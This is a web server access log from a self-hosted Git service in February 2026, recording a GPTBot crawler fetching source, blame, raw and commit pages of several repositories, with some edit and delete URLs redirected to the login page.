"/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" +[17/Feb/2026:15:29:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Contact.tsx" +[17/Feb/2026:15:30:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:30:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Header.tsx" +[17/Feb/2026:15:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Services.tsx" +[17/Feb/2026:15:30:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Hero.tsx" +[17/Feb/2026:15:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Services.tsx" +[17/Feb/2026:15:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Footer.tsx" +[17/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10071] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:15:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 10071] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:15:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore?display=source" [Client 74.7.227.38] [Length 10980] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:15:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf?display=source" [Client 74.7.227.38] [Length 11972] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:15:30:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:15:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:30:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fstatus.json" [Client 74.7.227.38] [Length 17705] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:15:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12761] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" +[17/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12764] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" +[17/Feb/2026:15:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" +[17/Feb/2026:15:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:15:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12762] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" +[17/Feb/2026:15:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:15:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11320] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" +[17/Feb/2026:15:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:15:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" +[17/Feb/2026:15:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12761] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" +[17/Feb/2026:15:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" +[17/Feb/2026:15:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" +[17/Feb/2026:15:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:15:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data" [Client 74.7.227.38] [Length 10578] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" 